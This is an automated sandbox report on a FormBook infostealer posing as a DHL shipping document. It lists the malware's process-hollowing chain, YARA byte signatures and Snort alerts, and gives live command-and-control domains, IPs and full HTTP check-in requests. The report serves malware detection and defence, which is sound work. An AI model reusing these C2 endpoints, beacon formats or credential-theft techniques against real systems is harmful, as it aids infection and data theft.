Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_SHIPPING_DOCUMENT.exe

Overview

General Information

Sample Name:DHL_SHIPPING_DOCUMENT.exe
Analysis ID:830431
MD5:04f5c33c1d3f795872b58f8c3922b49e
SHA1:3db181379815210d6fb0491d9660ddefff263224
SHA256:c0fee78265aef8793cb49690cc68fdf3debb84ab529bd59a2883a0c63ee0a6f5
Tags:DHLexeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • DHL_SHIPPING_DOCUMENT.exe (PID: 3092 cmdline: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe MD5: 04F5C33C1D3F795872B58F8C3922B49E)
    • eixfhzlwqd.exe (PID: 2040 cmdline: "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy MD5: 52BD228566EE8DDE1E37102049937D69)
      • conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • eixfhzlwqd.exe (PID: 856 cmdline: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe MD5: 52BD228566EE8DDE1E37102049937D69)
        • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • help.exe (PID: 2224 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1ef80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xadff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18217:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x18015:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17ab1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18117:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1828f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa9ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16cfc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dd37:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ecea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1ef80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xadff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18217:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.eixfhzlwqd.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.eixfhzlwqd.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20d23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcba2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x19fba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.eixfhzlwqd.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19db8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19854:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19eba:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a032:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc76d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18a9f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fada:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20a8d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.eixfhzlwqd.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.eixfhzlwqd.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x1ff23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbda2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x191ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.481.169.145.8849695802031412 03/20/23-11:27:41.124513
          SID:2031412
          Source Port:49695
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4104.233.254.11349709802031449 03/20/23-11:28:53.219959
          SID:2031449
          Source Port:49709
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4113.52.135.19349703802031453 03/20/23-11:28:29.350188
          SID:2031453
          Source Port:49703
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4113.52.135.19349703802031412 03/20/23-11:28:29.350188
          SID:2031412
          Source Port:49703
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.481.169.145.8849695802031453 03/20/23-11:27:41.124513
          SID:2031453
          Source Port:49695
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4199.192.28.11049699802031453 03/20/23-11:28:13.420032
          SID:2031453
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.48.8.8.860686532023883 03/20/23-11:29:11.441798
          SID:2023883
          Source Port:60686
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic
          Timestamp:192.168.2.481.169.145.8849695802031449 03/20/23-11:27:41.124513
          SID:2031449
          Source Port:49695
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.446.23.69.4449705802031412 03/20/23-11:28:37.254660
          SID:2031412
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4199.192.28.11049699802031412 03/20/23-11:28:13.420032
          SID:2031412
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4113.52.135.19349703802031449 03/20/23-11:28:29.350188
          SID:2031449
          Source Port:49703
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.446.23.69.4449705802031453 03/20/23-11:28:37.254660
          SID:2031453
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4104.233.254.11349709802031453 03/20/23-11:28:53.219959
          SID:2031453
          Source Port:49709
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.446.23.69.4449705802031449 03/20/23-11:28:37.254660
          SID:2031449
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4199.192.28.11049699802031449 03/20/23-11:28:13.420032
          SID:2031449
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4104.233.254.11349709802031412 03/20/23-11:28:53.219959
          SID:2031412
          Source Port:49709
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: DHL_SHIPPING_DOCUMENT.exeReversingLabs: Detection: 25%
          Source: DHL_SHIPPING_DOCUMENT.exeVirustotal: Detection: 39%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.sowmedia.site/d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw==Avira URL Cloud: Label: malware
          Source: http://www.getpay.life/d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw==Avira URL Cloud: Label: malware
          Source: http://www.363ww.top/d2a3/Avira URL Cloud: Label: malware
          Source: http://www.sowmedia.siteAvira URL Cloud: Label: malware
          Source: http://www.on-smooth.com/d2a3/Avira URL Cloud: Label: malware
          Source: http://www.luxgudonu.store/d2a3/Avira URL Cloud: Label: malware
          Source: http://www.sowmedia.site/d2a3/Avira URL Cloud: Label: malware
          Source: http://www.rw-bau.com/d2a3/Avira URL Cloud: Label: malware
          Source: http://www.motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJAvira URL Cloud: Label: malware
          Source: http://www.yh78898.com/d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJAvira URL Cloud: Label: malware
          Source: http://www.worldhortihealth.com/d2a3/Avira URL Cloud: Label: malware
          Source: http://www.espisys-technology.com/d2a3/Avira URL Cloud: Label: malware
          Source: http://www.getpay.lifeAvira URL Cloud: Label: malware
          Source: http://www.luxgudonu.store/d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJAvira URL Cloud: Label: malware
          Source: http://www.espisys-technology.com/d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJAvira URL Cloud: Label: malware
          Source: http://www.motherhoodinthegarden.com/d2a3/Avira URL Cloud: Label: malware
          Source: http://www.versicherungsgott.com/d2a3/Avira URL Cloud: Label: malware
          Source: http://www.yh78898.com/d2a3/Avira URL Cloud: Label: malware
          Source: http://motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62vAvira URL Cloud: Label: malware
          Source: http://www.on-smooth.com/d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg==Avira URL Cloud: Label: malware
          Source: http://www.versicherungsgott.com/d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ==Avira URL Cloud: Label: malware
          Source: http://www.getpay.life/d2a3/Avira URL Cloud: Label: malware
          Source: 3.2.eixfhzlwqd.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.eixfhzlwqd.exe.20a0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: DHL_SHIPPING_DOCUMENT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: DHL_SHIPPING_DOCUMENT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: eixfhzlwqd.exe, 00000001.00000003.319488467.000000001A150000.00000004.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000001.00000003.314926280.0000000019FC0000.00000004.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000B1F000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.320016666.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.321428954.000000000086B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.357421969.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002F6F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: eixfhzlwqd.exe, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000B1F000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.320016666.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.321428954.000000000086B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.357421969.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002F6F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: help.pdbGCTL source: eixfhzlwqd.exe, 00000003.00000002.357434868.00000000005E0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: help.pdb source: eixfhzlwqd.exe, 00000003.00000002.357434868.00000000005E0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 1_2_004089F8 FindFirstFileExW,1_2_004089F8

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.195.203 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 37.97.254.29 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.getpay.life
          Source: C:\Windows\explorer.exeNetwork Connect: 46.23.69.44 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.luxgudonu.store
          Source: C:\Windows\explorer.exeDomain query: www.motherhoodinthegarden.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.32 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.28.110 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sowmedia.site
          Source: C:\Windows\explorer.exeDomain query: www.363ww.top
          Source: C:\Windows\explorer.exeDomain query: www.espisys-technology.com
          Source: C:\Windows\explorer.exeDomain query: www.on-smooth.com
          Source: C:\Windows\explorer.exeDomain query: www.yh78898.com
          Source: C:\Windows\explorer.exeDomain query: www.versicherungsgott.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.233.254.113 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.88 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 113.52.135.193 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49695 -> 81.169.145.88:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49695 -> 81.169.145.88:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49695 -> 81.169.145.88:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 199.192.28.110:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 199.192.28.110:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 199.192.28.110:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 113.52.135.193:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 113.52.135.193:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 113.52.135.193:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49705 -> 46.23.69.44:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49705 -> 46.23.69.44:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49705 -> 46.23.69.44:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49709 -> 104.233.254.113:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49709 -> 104.233.254.113:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49709 -> 104.233.254.113:80
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:60686 -> 8.8.8.8:53
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: global trafficHTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ== HTTP/1.1Host: www.versicherungsgott.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJ HTTP/1.1Host: www.motherhoodinthegarden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw== HTTP/1.1Host: www.getpay.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJ HTTP/1.1Host: www.espisys-technology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg== HTTP/1.1Host: www.on-smooth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJ HTTP/1.1Host: www.luxgudonu.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw== HTTP/1.1Host: www.sowmedia.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJ HTTP/1.1Host: www.yh78898.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 37.97.254.29 37.97.254.29
          Source: global trafficHTTP traffic detected: POST /d2a3/ HTTP/1.1Host: www.motherhoodinthegarden.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.motherhoodinthegarden.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.motherhoodinthegarden.com/d2a3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 77 3d 52 50 52 67 48 34 38 6e 43 63 44 72 51 57 37 78 32 56 34 7a 42 72 67 44 64 38 49 50 6e 38 76 6f 64 73 6f 58 51 78 4b 31 59 4b 66 4d 35 7a 6e 72 59 4d 78 73 76 48 33 4d 57 79 7a 71 4f 73 38 68 53 6c 50 6b 43 37 73 48 61 6c 33 64 52 4a 61 49 55 74 48 45 77 42 30 64 45 57 55 47 65 6f 4a 4e 45 31 6e 4e 54 76 37 4c 76 51 4d 56 4e 5f 61 4c 49 47 62 36 39 54 61 42 67 30 39 53 57 70 77 6a 63 39 73 53 78 69 4e 63 75 5a 67 70 66 58 6f 4e 74 75 34 38 6b 37 52 6f 46 4b 7a 32 6d 63 36 72 59 4f 68 6c 31 76 75 6c 69 48 75 4b 41 73 35 69 34 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mw=RPRgH48nCcDrQW7x2V4zBrgDd8IPn8vodsoXQxK1YKfM5znrYMxsvH3MWyzqOs8hSlPkC7sHal3dRJaIUtHEwB0dEWUGeoJNE1nNTv7LvQMVN_aLIGb69TaBg09SWpwjc9sSxiNcuZgpfXoNtu48k7RoFKz2mc6rYOhl1vuliHuKAs5i4g).
          Source: global trafficHTTP traffic detected: POST /d2a3/ HTTP/1.1Host: www.getpay.lifeConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.getpay.lifeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getpay.life/d2a3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 77 3d 59 53 7e 70 65 44 58 45 52 32 41 4a 75 4b 79 6c 6f 61 34 46 4b 63 36 66 62 59 6a 65 76 54 76 39 30 65 44 47 65 57 35 53 31 54 34 38 7a 48 34 74 35 70 44 6d 76 32 66 63 50 43 4f 51 59 35 50 72 66 76 37 76 5a 41 39 51 79 43 50 51 6a 58 64 6d 4b 48 43 42 67 2d 76 4a 55 64 50 68 6e 56 36 4e 79 68 45 4a 6a 54 6f 41 6f 7a 4f 72 6a 65 4a 52 54 33 78 70 28 52 37 4e 6f 2d 4d 53 47 57 33 64 69 6f 43 62 53 5a 37 69 52 7a 7a 50 63 56 41 6d 66 68 42 39 43 77 73 74 76 76 64 6e 4c 50 62 78 32 52 33 49 31 47 69 67 75 4a 59 76 36 74 42 73 63 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mw=YS~peDXER2AJuKyloa4FKc6fbYjevTv90eDGeW5S1T48zH4t5pDmv2fcPCOQY5Prfv7vZA9QyCPQjXdmKHCBg-vJUdPhnV6NyhEJjToAozOrjeJRT3xp(R7No-MSGW3dioCbSZ7iRzzPcVAmfhB9CwstvvdnLPbx2R3I1GiguJYv6tBscg).
